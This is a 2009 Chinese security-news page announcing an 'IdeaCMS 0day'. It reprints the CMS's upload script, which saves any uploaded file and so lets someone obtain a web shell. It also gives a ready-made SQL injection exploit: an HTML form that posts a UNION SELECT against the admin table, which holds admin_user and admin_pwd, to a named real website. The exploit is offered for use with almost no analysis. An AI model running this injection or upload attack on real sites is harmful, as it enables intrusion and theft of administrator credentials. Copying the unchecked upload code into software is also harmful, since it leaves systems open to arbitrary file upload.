IdeaCMS 0daypc软件 文章资讯 手机软件

您当前的位置→图文中心新闻资讯安全播报IdeaCMS 0day

IdeaCMS 0day


2009/8/7  编辑:佚名 来源:本站整理

鸡肋的上传漏洞 不过对后台拿shell做了点贡献~

upinc.asp:

<!--#include file="chkuser.asp"-->
<%Server.ScriptTimeOut=5000%>
<style type="text/css">
*{ padding:0px; margin:0px; font-size:12px}
a{ color:#666666;}
a:hover{ color:#000000}
</style>
<!--#include FILE="upload_5xsoft.inc"-->
<%
f="Uploadpic/" '图片PHOTO存放文件程序夹路径
n=request.QueryString("n")
x=request.QueryString("x")
m=request("m")
if m="ok" then
set upload=new upload_5xsoft
set file=upload.file("file1")
formPath=f
if file.fileSize>0 then
file.saveAs Server.mappath(formPath&file.FileName)
%>
<script>
<%if x=1 then%>
parent.document.all.<%=n%>.value=parent.document.all.<%=n%>.value+"<%=f%><%=File.FileName%>";
<%else%>
parent.document.all.<%=n%>.value="admin/<%=f%><%=File.FileName%>";
<%end if%>
</script>

<input value="admin/<%=f%><%=File.FileName%>" name="text" type="hidden">
<a href="#" onclick="window.clipboardData.setData('text',text.value);">[复制地址]</a> <a href="upinc.asp?n=<%=n%>&x=<%=x%>">[重新上传]</a>
<%
end if
set file=nothing
set upload=nothing
else
%>
<form name="form1" method="post" action="upinc.asp?m=ok&n=<%=n%>&x=<%=x%>" enctype="multipart/form-data" style="margin:0px; margin:0px;" >
<input type="file" name="file1" style="width:200" class="tx1" value=""><input name="" type="submit" value="上传" />
</form>
<%end if%>

包含的那个文件只是用session验证下是否为空。 。 很鸡肋的~

这个上传 能上传任意一个文件。

下面是一个注射漏洞的exp 直接放exp了 不分析了 有兴趣的去down份下来分析下:

<H1>IdeaCMS 's EXP --code by Link</H1><br><br>
<form action="http://www.taikoosoft.com/NewsShow.asp?id=30+union select 1,2,3,4,5,6,7,8,9,10

from admin where" method=post name=myform enctype="multipart/form-data">
<input type=submit value=Fuck>
</form>
/*表里面有三个字段,
admin_user
admin_pwd
ID
我自己改变下语句日把


很不复杂。 不分析了

相关文章
  • Android 8.OBUG闹铃失效
  • 快手ID如何才能升级到快手号?快手ID升级至快手号详细教程
  • widows7CPU温度观察,Win7系统查看CPU温度的方法
  • Android应用的启动性能,如何测试Android应用的启动速度
  • 快手id升级快手号是什么意思?快手id怎么升级快手号?
  • iPhone 8解锁要靠刷脸,难道比Touch ID靠谱?
  • Android中Glide获取缓存大小并清除缓存图片
  • 安卓Android手机的神秘黑客代码
  • DNF新版本卢克地下城Raid模式奖励介绍
  • raid5数据恢复
  • 发表评论
    阅读排行
    相关热门
    网站帮助 - 广告合作 - 下载声明 - 网站地图